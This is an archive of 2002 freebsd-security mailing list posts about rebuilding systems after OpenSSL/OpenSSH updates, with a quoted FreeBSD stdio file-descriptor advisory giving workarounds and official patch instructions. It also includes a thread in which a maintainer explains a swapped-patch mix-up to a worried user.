Content-Transfer-Encoding: 8bit Sender: owner-freebsd-security@FreeBSD.ORG Precedence: bulk List-ID: List-Archive: (Web Archive) List-Help: (List Instructions) List-Subscribe: List-Unsubscribe: X-Loop: FreeBSD.org Hi, As part of the openssh panic I adopted the solution of installing the openssl and openssh ports using their overwrite-base feature. Subsequently I rebuilt all my ports that depended on openssl due to the major number change. Following the advice of adding NO_OPENSSL and NO_OPENSSH to my /etc/make.conf, I now find that programs like telnet with crypto support aren't built as part of make buildworld. How can I get a make buildworld to link such applications against the newly installed openssl-overwrite-base-0.9.6e port? I don't like the idea of building everything with base openssl and then installing openssl-0.9.6e to satisfy my rebuilt ports. Does anyone have a suggestion on how to handle this situation? Regards, Neil Darlow M.Sc. -- Say No to Software Patents -- Say No to TCPA -- Say No to Palladium ICQ: 135505456 E-Mail, Jabber, MSNM: neil@darlow.co.uk GnuPG Fingerprint: 359D B8FF 6273 6C32 BEAA 43F9 E579 E24A 531F 9048 To Unsubscribe: send mail to majordomo@FreeBSD.org with "unsubscribe freebsd-security" in the body of the message From owner-freebsd-security Tue Jul 30 15:26:34 2002 Delivered-To: freebsd-security@freebsd.org Received: from mx1.FreeBSD.org (mx1.FreeBSD.org [216.136.204.125]) by hub.freebsd.org (Postfix) with ESMTP id E8F2937B400 for ; Tue, 30 Jul 2002 15:26:32 -0700 (PDT) Received: from mail.npubs.com (npubs.com [207.111.208.224]) by mx1.FreeBSD.org (Postfix) with ESMTP id 9166443E31 for ; Tue, 30 Jul 2002 15:26:32 -0700 (PDT) (envelope-from nielsen@memberwebs.com) From: "Nielsen" To: "Michael Nottebrock" Cc: References: <121122473609.20020730210032@buz.ch> <3D46E7ED.1040006@gmx.net> Subject: Re: OpenSSH not using libssl? MIME-Version: 1.0 Content-Type: text/plain; charset="iso-8859-1" Content-Transfer-Encoding: 7bit X-Priority: 3 X-MSMail-Priority: Normal X-Mailer: Microsoft Outlook Express 6.00.2600.0000 X-MimeOLE: Produced By Microsoft MimeOLE V6.00.2600.0000 Message-Id: <20020730222715.80CCA43C361@mail.npubs.com> Date: Tue, 30 Jul 2002 22:27:15 +0000 (GMT) Sender: owner-freebsd-security@FreeBSD.ORG Precedence: bulk List-ID: List-Archive: (Web Archive) List-Help: (List Instructions) List-Subscribe: List-Unsubscribe: X-Loop: FreeBSD.org I think libcrypto has the ASN.1 bug. Nate ----- Original Message ----- > It uses libcrypto, but it shouldn't be vulnerable. To Unsubscribe: send mail to majordomo@FreeBSD.org with "unsubscribe freebsd-security" in the body of the message From owner-freebsd-security Tue Jul 30 16:10:16 2002 Delivered-To: freebsd-security@freebsd.org Received: from mx1.FreeBSD.org (mx1.FreeBSD.org [216.136.204.125]) by hub.freebsd.org (Postfix) with ESMTP id E6CA937B400 for ; Tue, 30 Jul 2002 16:10:12 -0700 (PDT) Received: from mail.gmx.net (mail.gmx.net [213.165.64.20]) by mx1.FreeBSD.org (Postfix) with SMTP id C65E443E5E for ; Tue, 30 Jul 2002 16:10:11 -0700 (PDT) (envelope-from michaelnottebrock@gmx.net) Received: (qmail 8290 invoked by uid 0); 30 Jul 2002 23:10:10 -0000 Received: from pd9003286.dip.t-dialin.net (HELO gmx.net) (217.0.50.134) by mail.gmx.net (mp006-rz3) with SMTP; 30 Jul 2002 23:10:10 -0000 Message-ID: <3D471CD4.2010607@gmx.net> Date: Wed, 31 Jul 2002 01:10:12 +0200 From: Michael Nottebrock User-Agent: Mozilla/5.0 (X11; U; Linux i386; en-US; rv:1.0rc2) Gecko/20020513 Netscape/7.0b1 X-Accept-Language: en-us, en MIME-Version: 1.0 To: Nielsen Cc: freebsd-security@FreeBSD.ORG Subject: Re: OpenSSH not using libssl? References: <121122473609.20020730210032@buz.ch> <3D46E7ED.1040006@gmx.net> <20020730222715.80CCA43C361@mail.npubs.com> X-Enigmail-Version: 0.61.1.0 X-Enigmail-Supports: pgp-inline, pgp-mime Content-Type: multipart/signed; micalg=pgp-sha1; protocol="application/pgp-signature"; boundary="------------enig94B1047890529B542E71C0E8" Sender: owner-freebsd-security@FreeBSD.ORG Precedence: bulk List-ID: List-Archive: (Web Archive) List-Help: (List Instructions) List-Subscribe: List-Unsubscribe: X-Loop: FreeBSD.org The following is an OpenPGP/MIME signed message created by Enigmail/Mozilla, following RFC 2440 and RFC 2015 --------------enig94B1047890529B542E71C0E8 Content-Type: text/plain; charset=us-ascii; format=flowed Content-Transfer-Encoding: 7bit Nielsen wrote: > I think libcrypto has the ASN.1 bug. > > Nate > > ----- Original Message ----- > >>It uses libcrypto, but it shouldn't be vulnerable. I meant that openssh isn't vulnerable (since, afair, it doesn't use the ASN.1 parser). Regards, -- Michael Nottebrock "The circumstance ends uglily in the cruel result." - Babelfish --------------enig94B1047890529B542E71C0E8 Content-Type: application/pgp-signature -----BEGIN PGP SIGNATURE----- Version: GnuPG v1.0.7 (FreeBSD) Comment: Using GnuPG with Mozilla - http://enigmail.mozdev.org iD4DBQE9RxzUXhc68WspdLARAuO4AJjGUIGKZWeMkuTX9Lg9cMeQbC3oAJ0dVlN3 QKPwTBUbAqoOU71LY8NEVQ== =Am1T -----END PGP SIGNATURE----- --------------enig94B1047890529B542E71C0E8-- To Unsubscribe: send mail to majordomo@FreeBSD.org with "unsubscribe freebsd-security" in the body of the message From owner-freebsd-security Tue Jul 30 18:40:54 2002 Delivered-To: freebsd-security@freebsd.org Received: from mx1.FreeBSD.org (mx1.FreeBSD.org [216.136.204.125]) by hub.freebsd.org (Postfix) with ESMTP id 20C3437B400 for ; Tue, 30 Jul 2002 18:40:46 -0700 (PDT) Received: from localhost.neotext.ca (h24-70-64-200.ed.shawcable.net [24.70.64.200]) by mx1.FreeBSD.org (Postfix) with ESMTP id C418A43E65 for ; Tue, 30 Jul 2002 18:40:44 -0700 (PDT) (envelope-from campbell@babayaga.neotext.ca) Received: from babayaga.neotext.ca (localhost.neotext.ca [127.0.0.1]) by localhost.neotext.ca (8.11.6/8.11.0) with ESMTP id g6V1f5u40958 for ; Tue, 30 Jul 2002 19:41:06 -0600 (MDT) (envelope-from campbell@babayaga.neotext.ca) From: "Duncan Patton a Campbell is Dhu" To: security@FreeBSD.ORG Subject: Re: FreeBSD Security Advisory FreeBSD-SA-02:23.stdio [REVISED] Date: Tue, 30 Jul 2002 19:41:05 -0600 Message-Id: <20020731014105.M64421@babayaga.neotext.ca> In-Reply-To: <200207301821.g6UIL5nc034058@freefall.freebsd.org> References: <200207301821.g6UIL5nc034058@freefall.freebsd.org> X-Mailer: Open WebMail 1.70 20020712 X-OriginatingIP: 127.0.0.1 (campbell) MIME-Version: 1.0 Content-Type: text/plain; charset=iso-8859-1 Sender: owner-freebsd-security@FreeBSD.ORG Precedence: bulk List-ID: List-Archive: (Web Archive) List-Help: (List Instructions) List-Subscribe: List-Unsubscribe: X-Loop: FreeBSD.org Peculiar but true: The first time I fetched these patches (I got both) the stdio and stdio2 patches both had 804 octets in 'em: -rw-r--r-- 1 root wheel 804 Jul 29 21:26 stdio.patch.v1.2 -rw-r--r-- 1 root wheel 305 Jul 29 21:26 stdio.patch.v1.2.asc -rw-r--r-- 1 root wheel 804 Jul 29 21:26 stdio2.patch.v1.2 -rw-r--r-- 1 root wheel 305 Jul 29 21:26 stdio2.patch.v1.2.asc On the second go they differed: -rw------- 1 root wheel 3715 Jul 30 19:15 stdio.patch.v1.2 -rw------- 1 root wheel 305 Jul 30 19:15 stdio.patch.v1.2.asc -rw-r--r-- 1 root wheel 804 Jul 29 21:26 stdio2.patch.v1.2 -rw-r--r-- 1 root wheel 305 Jul 29 21:26 stdio2.patch.v1.2.asc Warning, warning, Will Robinson! Would anyone care to hazard a guess as to whether I've been rooted? Duncan Patton a Campbell is Duibh ;-) ---------- Original Message ----------- From: FreeBSD Security Advisories To: FreeBSD Security Advisories Sent: Tue, 30 Jul 2002 11:21:05 -0700 (PDT) Subject: FreeBSD Security Advisory FreeBSD-SA-02:23.stdio [REVISED] > -----BEGIN PGP SIGNED MESSAGE----- > > ============================================================================= > FreeBSD-SA-02:23.stdio > Security Advisory > The FreeBSD Project > > Topic: insecure handling of stdio file descriptors > > Category: core > Module: kernel > Announced: 2002-04-22 > Credits: Joost Pol , > Georgi Guninski > Affects: All releases of FreeBSD up to and > including 4.6-RELEASE > 4.6-STABLE prior to the correction date > Corrected: 2002-07-30 15:40:46 UTC (RELENG_4) > 2002-07-30 15:42:11 UTC (RELENG_4_6) > 2002-07-30 15:42:46 UTC (RELENG_4_5) > 2002-07-30 15:43:17 UTC (RELENG_4_4) > FreeBSD only: NO > > 0. Revision History > > v1.0 2002-04-22 Initial release > v1.1 2002-04-23 Patch and revision numbers updated > v1.2 2002-07-29 procfs issue; updated patch > > I. Background > > By convention, POSIX systems associate file > descriptors 0, 1, and 2 with standard input, standard > output, and standard error, respectively. Almost all > applications give these stdio file descriptors special > significance, such as writing error messages to > standard error (file descriptor 2). > > In new processes, all file descriptors are duplicated > from the parent process. Unless these descriptors are > marked close-on-exec, they retain their state during > an exec. > > All POSIX systems assign file descriptors in > sequential order, starting with the lowest unused file > descriptor. For example, if a newly exec'd process > has file descriptors 0 and 1 open, but file descriptor > 2 closed, and then opens a file, the new file > descriptor is guaranteed to be 2 (standard error). > > II. Problem Description > > Some programs are set-user-id or set-group-id, and > therefore run with increased privileges. If such a > program is started with some of the stdio file > descriptors closed, the program may open a file and > inadvertently associate it with standard input, > standard output, or standard error. The program may > then read data from or write data to the file > inappropriately. If the file is one that the user > would normally not have privileges to open, this may > result in an opportunity for privilege escalation. > > The original correction for this problem > (corresponding to the first revision of this advisory) > contained an error. Systems using procfs or linprocfs > could still be exploited. The dates for the original, > incomplete correction were: > > Corrected: 2002-04-21 13:06:45 UTC (RELENG_4) > 2002-04-21 13:08:57 UTC (RELENG_4_5) > 2002-04-21 13:10:51 UTC (RELENG_4_4) > > III. Impact > > Local users may gain superuser privileges. It is > known that the `keyinit' set-user-id program is > exploitable using this method. There may be other > programs that are exploitable. > > IV. Workaround > > [FreeBSD systems earlier than 4.5-RELEASE-p4 and 4.4- > RELEASE-p11] > > None. The set-user-id bit may be removed from > `keyinit' using the following command, but note that > there may be other programs that can be exploited. > > # chmod 0555 /usr/bin/keyinit > > [FreeBSD versions 4.5-RELEASE-p4 or later, 4.4-RELEASE- > p11 or later, > 4.6-RELEASE, and 4.6-STABLE] > > Unmount all instances of the procfs and linprocfs > filesystems using the umount(8) command: > > # umount -f -a -t procfs > # umount -f -a -t linprocfs > > V. Solution > > The kernel was modified to check file descriptors 0, 1, > and 2 when starting a set-user-ID or set-group-ID > executable. If any of these are not in use, they will > be redirected to /dev/null. > > 1) Upgrade your vulnerable system to 4.6-STABLE; or to > any of the RELENG_4_6 (4.6.1-RELEASE-p1), RELENG_4_5 > (4.5-RELEASE-p10), or RELENG_4_4 (4.4-RELEASE-p17) > security branches dated after the respective > correction dates. > > 2) To patch your present system: > > a) Download the relevant patch from the location below, > and verify the detached PGP signature using your PGP utility. > > [FreeBSD systems earlier than 4.5-RELEASE-p4 and 4.4- > RELEASE-p11] > > # fetch ftp://ftp.FreeBSD.org/pub/FreeBSD/CERT/patches/SA-02:23/stdio.patch.v1.2 > # fetch ftp://ftp.FreeBSD.org/pub/FreeBSD/CERT/patches/SA-02:23/stdio.patch.v1.2.asc > > [FreeBSD versions 4.5-RELEASE-p4 or later, 4.4-RELEASE- > p11 or later, > 4.6-RELEASE, and 4.6-STABLE] > > # fetch ftp://ftp.FreeBSD.org/pub/FreeBSD/CERT/patches/SA-02:23/stdio2.patch.v1.2 > # fetch ftp://ftp.FreeBSD.org/pub/FreeBSD/CERT/patches/SA-02:23/stdio2.patch.v1.2.asc > > b) Execute the following commands as root: > > # cd /usr/src > # patch < /path/to/patch > > c) Recompile your kernel as described in > http://www.freebsd.org/handbook/kernelconfig.html and > reboot the system. > > VI. Correction details > > The following list contains the revision numbers of > each file that was corrected in FreeBSD. > > Path > Revision Branch - -------------------------- > ----------------------------------------------- sys/sys/filedesc.h > RELENG_4 > 1.19.2.4 RELENG_4_6 > 1.19.2.4 RELENG_4_5 > 1.19.2.3.6.1 > RELENG_4_4 > 1.19.2.3.4.1 sys/kern/kern_exec.c RELENG_4 > > 1.107.2.15 RELENG_4_6 > 1.107.2.14.2.1 RELENG_4_5 > 1.107.2.13.2.2 > RELENG_4_4 > 1.107.2.8.2.3 sys/kern/kern_descrip.c RELENG_4 > 1.81.2.12 > RELENG_4_6 > 1.81.2.14 RELENG_4_5 > 1.81.2.9.2.2 RELENG_4_4 > 1.81.2.8.2.2 > sys/conf/newvers.sh RELENG_4_6 > 1.44.2.23.2.6 RELENG_4_5 > > 1.44.2.20.2.11 RELENG_4_4 > 1.44.2.17.2.16 - -------------------- > ----------------------------------------------------- > > VII. References > > PINE-CERT-20020401 > > -----BEGIN PGP SIGNATURE----- > Version: GnuPG v1.0.7 (FreeBSD) > > iQCVAwUBPUbXw1UuHi5z0oilAQFgKQP/eOnmHorw/4NVEAEKTQp4+X7Px9p1wUGq > 6OcLH5GuTbbwexd7KbCjbjzNZF7zgz1Qph2v7NQXb+W/ZaW2hEgcoURXkBomVxjl > 61oXu72P35bmgNo7GQ794v/WDHd8FymtBv0kyY/vuZqg6l99tTuwi2ryV1ZszVrh > w21lAbhkyQo= > =YGVw > -----END PGP SIGNATURE----- > > To Unsubscribe: send mail to majordomo@FreeBSD.org > with "unsubscribe freebsd-security-notifications" in > the body of the message ------- End of Original Message ------- To Unsubscribe: send mail to majordomo@FreeBSD.org with "unsubscribe freebsd-security" in the body of the message From owner-freebsd-security Tue Jul 30 19:13:15 2002 Delivered-To: freebsd-security@freebsd.org Received: from mx1.FreeBSD.org (mx1.FreeBSD.org [216.136.204.125]) by hub.freebsd.org (Postfix) with ESMTP id 52C0737B400 for ; Tue, 30 Jul 2002 19:13:13 -0700 (PDT) Received: from bunning.skiltech.com (bunning.skiltech.com [216.235.79.240]) by mx1.FreeBSD.org (Postfix) with ESMTP id 9A47B43E31 for ; Tue, 30 Jul 2002 19:13:12 -0700 (PDT) (envelope-from minter@lunenburg.org) Received: (from root@localhost) by bunning.skiltech.com (8.12.3/8.12.3) id g6V2DB82047711 for security@freebsd.org; Tue, 30 Jul 2002 22:13:11 -0400 (EDT) (envelope-from minter@lunenburg.org) Received: from dundas.lunenburg.org (rdu162-234-201.nc.rr.com [24.162.234.201]) (authenticated bits=0) by bunning.skiltech.com (8.12.3/8.12.3) with ESMTP id g6V2D504047701 (version=TLSv1/SSLv3 cipher=EDH-RSA-DES-CBC3-SHA bits=168 verify=NO) for ; Tue, 30 Jul 2002 22:13:09 -0400 (EDT) (envelope-from minter@lunenburg.org) Date: Tue, 30 Jul 2002 22:13:05 -0400 Mime-Version: 1.0 (Apple Message framework v482) Content-Type: text/plain; charset=US-ASCII; format=flowed Subject: OpenSSL workaround From: "H. Wade Minter" To: security@freebsd.org Content-Transfer-Encoding: 7bit Message-Id: <0C59F80C-A42B-11D6-9472-003065819B10@lunenburg.org> X-Mailer: Apple Mail (2.482) X-Virus-Scanned: by AMaViS perl-11 Sender: owner-freebsd-security@FreeBSD.ORG Precedence: bulk List-ID: List-Archive: (Web Archive) List-Help: (List Instructions) List-Subscribe: List-Unsubscribe: X-Loop: FreeBSD.org I saw that openssl got committed to RELENG_4_6 today, but haven't seen a security announcement go by. What's the recommended way to patch this openssl hole? --Wade To Unsubscribe: send mail to majordomo@FreeBSD.org with "unsubscribe freebsd-security" in the body of the message From owner-freebsd-security Tue Jul 30 20:19:21 2002 Delivered-To: freebsd-security@freebsd.org Received: from mx1.FreeBSD.org (mx1.FreeBSD.org [216.136.204.125]) by hub.freebsd.org (Postfix) with ESMTP id DBD2637B400 for ; Tue, 30 Jul 2002 20:19:19 -0700 (PDT) Received: from cage.simianscience.com (cage.simianscience.com [64.7.134.1]) by mx1.FreeBSD.org (Postfix) with ESMTP id 04D8743E6A for ; Tue, 30 Jul 2002 20:19:19 -0700 (PDT) (envelope-from mike@sentex.net) Received: from house.sentex.net (fcage [192.168.0.2]) by cage.simianscience.com (8.12.5/8.12.3) with ESMTP id g6V3JG1A035886 for ; Tue, 30 Jul 2002 23:19:17 -0400 (EDT) (envelope-from mike@sentex.net) Message-Id: <5.1.0.14.0.20020730231635.040ee248@192.168.0.12> X-Sender: mdtancsa@192.168.0.12 X-Mailer: QUALCOMM Windows Eudora Version 5.1 Date: Tue, 30 Jul 2002 23:21:20 -0400 To: security@freebsd.org From: Mike Tancsa Subject: apache mod_ssl ? Mime-Version: 1.0 Content-Type: text/plain; charset="us-ascii"; format=flowed X-Virus-Scanned: amavis-20020220 Sender: owner-freebsd-security@FreeBSD.ORG Precedence: bulk List-ID: List-Archive: (Web Archive) List-Help: (List Instructions) List-Subscribe: List-Unsubscribe: X-Loop: FreeBSD.org After a buildworld, do I need to worry about apache with mod_ssl ? Are there parts that are statically compiled using openSSL ? ---Mike -------------------------------------------------------------------- Mike Tancsa, tel +1 519 651 3400 Sentex Communications, mike@sentex.net Providing Internet since 1994 www.sentex.net Cambridge, Ontario Canada www.sentex.net/mike To Unsubscribe: send mail to majordomo@FreeBSD.org with "unsubscribe freebsd-security" in the body of the message From owner-freebsd-security Tue Jul 30 20:20:18 2002 Delivered-To: freebsd-security@freebsd.org Received: from mx1.FreeBSD.org (mx1.FreeBSD.org [216.136.204.125]) by hub.freebsd.org (Postfix) with ESMTP id 10C9337B400 for ; Tue, 30 Jul 2002 20:20:13 -0700 (PDT) Received: from gw.nectar.cc (gw.nectar.cc [208.42.49.153]) by mx1.FreeBSD.org (Postfix) with ESMTP id 7931943E31 for ; Tue, 30 Jul 2002 20:20:12 -0700 (PDT) (envelope-from nectar@nectar.cc) Received: from madman.nectar.cc (madman.nectar.cc [10.0.1.111]) by gw.nectar.cc (Postfix) with ESMTP id F148210; Tue, 30 Jul 2002 22:20:11 -0500 (CDT) Received: from madman.nectar.cc (localhost [IPv6:::1]) by madman.nectar.cc (8.12.3/8.12.3) with ESMTP id g6V3KBU4049322; Tue, 30 Jul 2002 22:20:11 -0500 (CDT) (envelope-from nectar@madman.nectar.cc) Received: (from nectar@localhost) by madman.nectar.cc (8.12.3/8.12.3/Submit) id g6V3KAjM049276; Tue, 30 Jul 2002 22:20:10 -0500 (CDT) Date: Tue, 30 Jul 2002 22:20:10 -0500 From: "Jacques A. Vidrine" To: Duncan Patton a Campbell is Dhu Cc: security@FreeBSD.ORG Subject: Re: FreeBSD Security Advisory FreeBSD-SA-02:23.stdio [REVISED] Message-ID: <20020731032010.GA38906@madman.nectar.cc> References: <200207301821.g6UIL5nc034058@freefall.freebsd.org> <20020731014105.M64421@babayaga.neotext.ca> Mime-Version: 1.0 Content-Type: text/plain; charset=us-ascii Content-Disposition: inline In-Reply-To: <20020731014105.M64421@babayaga.neotext.ca> X-Url: http://www.nectar.cc/ User-Agent: Mutt/1.5.1i-ja.1 Sender: owner-freebsd-security@FreeBSD.ORG Precedence: bulk List-ID: List-Archive: (Web Archive) List-Help: (List Instructions) List-Subscribe: List-Unsubscribe: X-Loop: FreeBSD.org On Tue, Jul 30, 2002 at 07:41:05PM -0600, Duncan Patton a Campbell is Dhu wrote: > Peculiar but true: > > The first time I fetched these patches (I got both) the > stdio and stdio2 patches both had 804 octets in 'em: > [snip] > > On the second go they differed: You're just lucky. :-) In fact, when I originally uploaded the patches, I mixed up stdio.patch and stdio2.patch. Someone later pointed out the error to me, so I swapped them. You probably caught a glimpse of the directory listing right before and right after that FTP mirror pulled down the updates. Cheers, -- Jacques A. Vidrine http://www.nectar.cc/ NTT/Verio SME . FreeBSD UNIX . Heimdal Kerberos jvidrine@verio.net . nectar@FreeBSD.org . nectar@kth.se To Unsubscribe: send mail to majordomo@FreeBSD.org with "unsubscribe freebsd-security" in the body of the message From owner-freebsd-security Tue Jul 30 20:21:35 2002 Delivered-To: freebsd-security@freebsd.org Received: from mx1.FreeBSD.org (mx1.FreeBSD.org [216.136.204.125]) by hub.freebsd.org (Postfix) with ESMTP id 233A437B400 for ; Tue, 30 Jul 2002 20:21:33 -0700 (PDT) Received: from gw.nectar.cc (gw.nectar.cc [208.42.49.153]) by mx1.FreeBSD.org (Postfix) with ESMTP id 7486043E6A for ; Tue, 30 Jul 2002 20:21:32 -0700 (PDT) (envelope-from nectar@nectar.cc) Received: from madman.nectar.cc (madman.nectar.cc [10.0.1.111]) by gw.nectar.cc (Postfix) with ESMTP id 15A2310; Tue, 30 Jul 2002 22:21:32 -0500 (CDT) Received: from madman.nectar.cc (localhost [IPv6:::1]) by madman.nectar.cc (8.12.3/8.12.3) with ESMTP id g6V3LVU4053682; Tue, 30 Jul 2002 22:21:31 -0500 (CDT) (envelope-from nectar@madman.nectar.cc) Received: (from nectar@localhost) by madman.nectar.cc (8.12.3/8.12.3/Submit) id g6V3LVh9053640; Tue, 30 Jul 2002 22:21:31 -0500 (CDT) Date: Tue, 30 Jul 2002 22:21:31 -0500 From: "Jacques A. Vidrine" To: "H. Wade Minter" Cc: security@freebsd.org Subject: Re: OpenSSL workaround Message-ID: <20020731032131.GB38906@madman.nectar.cc> References: <0C59F80C-A42B-11D6-9472-003065819B10@lunenburg.org> Mime-Version: 1.0 Content-Type: text/plain; charset=us-ascii Content-Disposition: inline In-Reply-To: <0C59F80C-A42B-11D6-9472-003065819B10@lunenburg.org> X-Url: http://www.nectar.cc/ User-Agent: Mutt/1.5.1i-ja.1 Sender: owner-freebsd-security@FreeBSD.ORG Precedence: bulk List-ID: List-Archive: (Web Archive) List-Help: (List Instructions) List-Subscribe: List-Unsubscribe: X-Loop: FreeBSD.org On Tue, Jul 30, 2002 at 10:13:05PM -0400, H. Wade Minter wrote: > I saw that openssl got committed to RELENG_4_6 today, but haven't seen a > security announcement go by. What's the recommended way to patch this > openssl hole? You can cvsup to RELENG_4_6. I probably won't send out the announcement until I've finished with RELENG_4_5 and RELENG_4_4, and that won't be tonight. For various reasons, merging and testing the upgrade is time consuming. Cheers, -- Jacques A. Vidrine http://www.nectar.cc/ NTT/Verio SME . FreeBSD UNIX . Heimdal Kerberos jvidrine@verio.net . nectar@FreeBSD.org . nectar@kth.se To Unsubscribe: send mail to majordomo@FreeBSD.org with "unsubscribe freebsd-security" in the body of the message From owner-freebsd-security Tue Jul 30 20:35:48 2002 Delivered-To: freebsd-security@freebsd.org Received: from mx1.FreeBSD.org (mx1.FreeBSD.org [216.136.204.125]) by hub.freebsd.org (Postfix) with ESMTP id 8DBCD37B400 for ; Tue, 30 Jul 2002 20:35:46 -0700 (PDT) Received: from net2.dinoex.sub.org (net2.dinoex.de [212.184.201.182]) by mx1.FreeBSD.org (Postfix) with ESMTP id 535C843E65 for ; Tue, 30 Jul 2002 20:35:44 -0700 (PDT) (envelope-from dirk.meyer@dinoex.sub.org) Received: from net2.dinoex.sub.org (dinoex@net2.dinoex.sub.org [127.0.0.1]) by net2.dinoex.sub.org (8.12.5/8.12.5) with ESMTP id g6V3ZB5H004833 for ; Wed, 31 Jul 2002 05:35:13 +0200 (CEST) (envelope-from dirk.meyer@dinoex.sub.org) X-MDaemon-Deliver-To: Received: from gate.dinoex.sub.org (dinoex@localhost) by net2.dinoex.sub.org (8.12.5/8.12.5/Submit) with BSMTP id g6V3Z9kv004809 for ; Wed, 31 Jul 2002 05:35:09 +0200 (CEST) (envelope-from dirk.meyer@dinoex.sub.org) To: freebsd-security@FreeBSD.ORG Message-ID: From: dirk.meyer@dinoex.sub.org (Dirk Meyer) Organization: privat Subject: Re: Fixing OpenSSL Properly Date: Wed, 31 Jul 2002 05:27:32 +0200 X-Mailer: Dinoex 1.79 References: <20020730195807.28306.qmail@web11607.mail.yahoo.com> X-Gateway: ZCONNECT gate.dinoex.sub.org [UNIX/Connect 0.94] X-PGP-Fingerprint: 44 16 EC 0A D3 3A 4F 28 8A 8A 47 93 F1 CF 2F 12 X-Copyright: (C) Copyright 2001 by Dirk Meyer -- All rights reserved. X-PGP-Key-Avail: mailto:pgp-public-keys@keys.de.pgp.net Subject:GET 0x331CDA5D X-ZC-VIA: 20020731000000S+2@dinoex.sub.org X-Accept-Language: de,en X-Noad: Please don't send me ad's by mail. I'm bored by this type of mail. X-Note: sending SPAM is a violation of both german and US law and will at least trigger a complaint at your provider's postmaster. X-No-Archive: yes Sender: owner-freebsd-security@FreeBSD.ORG Precedence: bulk List-ID: List-Archive: (Web Archive) List-Help: (List Instructions) List-Subscribe: List-Unsubscribe: X-Loop: FreeBSD.org Holt Grendal wrote: > I figure: > cd /usr/ports/security/openssl > make OPENSSL_OVERWRITE_BASE=YES install > > Then Rebuild libssh, mod_ssl, and anything else along > with restarting sshd, apache and anything else? > > Will this all work fine and dandy? for the ports this will work fine. Only some apps in the base system may fail. kind regards Dirk - Dirk Meyer, Im Grund 4, 34317 Habichtswald, Germany - [dirk.meyer@dinoex.sub.org],[dirk.meyer@guug.de],[dinoex@FreeBSD.org] To Unsubscribe: send mail to majordomo@FreeBSD.org with "unsubscribe freebsd-security" in the body of the message From owner-freebsd-security Tue Jul 30 20:35:56 2002 Delivered-To: freebsd-security@freebsd.org Received: from mx1.FreeBSD.org (mx1.FreeBSD.org [216.136.204.125]) by hub.freebsd.org (Postfix) with ESMTP id 7472237B405 for ; Tue, 30 Jul 2002 20:35:48 -0700 (PDT) Received: from net2.dinoex.sub.org (net2.dinoex.de [212.184.201.182]) by mx1.FreeBSD.org (Postfix) with ESMTP id 2EE7743E65 for ; Tue, 30 Jul 2002 20:35:47 -0700 (PDT) (envelope-from dirk.meyer@dinoex.sub.org) Received: from net2.dinoex.sub.org (dinoex@net2.dinoex.sub.org [127.0.0.1]) by net2.dinoex.sub.org (8.12.5/8.12.5) with ESMTP id g6V3ZE5H004854 for ; Wed, 31 Jul 2002 05:35:16 +0200 (CEST) (envelope-from dirk.meyer@dinoex.sub.org) X-MDaemon-Deliver-To: Received: from gate.dinoex.sub.org (dinoex@localhost) by net2.dinoex.sub.org (8.12.5/8.12.5/Submit) with BSMTP id g6V3ZDoh004832 for ; Wed, 31 Jul 2002 05:35:13 +0200 (CEST) (envelope-from dirk.meyer@dinoex.sub.org) To: freebsd-security@FreeBSD.ORG Message-ID: From: dirk.meyer@dinoex.sub.org (Dirk Meyer) Organization: privat Subject: Re: make buildworld after openssl/openssh-overwrite-base Date: Wed, 31 Jul 2002 05:27:32 +0200 X-Mailer: Dinoex 1.79 References: <200207302118.g6ULI6q5015864@router.darlow.co.uk> X-Gateway: ZCONNECT gate.dinoex.sub.org [UNIX/Connect 0.94] X-PGP-Fingerprint: 44 16 EC 0A D3 3A 4F 28 8A 8A 47 93 F1 CF 2F 12 X-Copyright: (C) Copyright 2001 by Dirk Meyer -- All rights reserved. X-PGP-Key-Avail: mailto:pgp-public-keys@keys.de.pgp.net Subject:GET 0x331CDA5D X-ZC-VIA: 20020731000000S+2@dinoex.sub.org X-Accept-Language: de,en X-Noad: Please don't send me ad's by mail. I'm bored by this type of mail. X-Note: sending SPAM is a violation of both german and US law and will at least trigger a complaint at your provider's postmaster. X-No-Archive: yes Sender: owner-freebsd-security@FreeBSD.ORG Precedence: bulk List-ID: List-Archive: (Web Archive) List-Help: (List Instructions) List-Subscribe: List-Unsubscribe: X-Loop: FreeBSD.org Neil Darlow wrote: > Following the advice of adding NO_OPENSSL and NO_OPENSSH to my > /etc/make.conf [...] > How can I get a make buildworld to link such applications against the newly > installed openssl-overwrite-base-0.9.6e port? You might have to chnage in the dirs by hand and rebuild/install it as a seperate step after installworld. kind regards Dirk - Dirk Meyer, Im Grund 4, 34317 Habichtswald, Germany - [dirk.meyer@dinoex.sub.org],[dirk.meyer@guug.de],[dinoex@FreeBSD.org] To Unsubscribe: send mail to majordomo@FreeBSD.org with "unsubscribe freebsd-security" in the body of the message From owner-freebsd-security Wed Jul 31 1:25:43 2002 Delivered-To: freebsd-security@freebsd.org Received: from mx1.FreeBSD.org (mx1.FreeBSD.org [216.136.204.125]) by hub.freebsd.org (Postfix) with ESMTP id 79F6737B400 for ; Wed, 31 Jul 2002 01:25:39 -0700 (PDT) Received: from smtp.firebox.ca (userfc050.dsl.pipex.com [62.190.122.50]) by mx1.FreeBSD.org (Postfix) with ESMTP id A02D243E42 for ; Wed, 31 Jul 2002 01:25:38 -0700 (PDT) (envelope-from scott@roeder.org.uk) Received: from roeder.org.uk (sumo.isode.com [193.133.227.115]) by smtp.firebox.ca (Postfix) with ESMTP id 585204B48E for ; Wed, 31 Jul 2002 09:25:46 +0100 (BST) Message-ID: <3D479EDD.2060503@roeder.org.uk> Date: Wed, 31 Jul 2002 09:25:01 +0100 From: Scott Roeder User-Agent: Mozilla/5.0 (X11; U; Linux i686; en-US; rv:1.1b) Gecko/20020722 X-Accept-Language: en-us, en MIME-Version: 1.0 To: FreeBSD-security@FreeBSD.org Subject: Subscribe X-Enigmail-Version: 0.65.1.0 X-Enigmail-Supports: pgp-inline, pgp-mime Content-Type: multipart/signed; protocol="application/x-pkcs7-signature"; micalg=sha1; boundary="------------ms060105000607000906080602" Sender: owner-freebsd-security@FreeBSD.ORG Precedence: bulk List-ID: List-Archive: (Web Archive) List-Help: (List Instructions) List-Subscribe: List-Unsubscribe: X-Loop: FreeBSD.org This is a cryptographically signed message in MIME format. --------------ms060105000607000906080602 Content-Type: text/plain; charset=us-ascii; format=flowed Content-Transfer-Encoding: 7bit Subscribe --------------ms060105000607000906080602 Content-Type: application/x-pkcs7-signature; name="smime.p7s" Content-Transfer-Encoding: base64 Content-Disposition: attachment; filename="smime.p7s" Content-Description: S/MIME Cryptographic Signature MIAGCSqGSIb3DQEHAqCAMIACAQExCzAJBgUrDgMCGgUAMIAGCSqGSIb3DQEHAQAAoIIINTCC 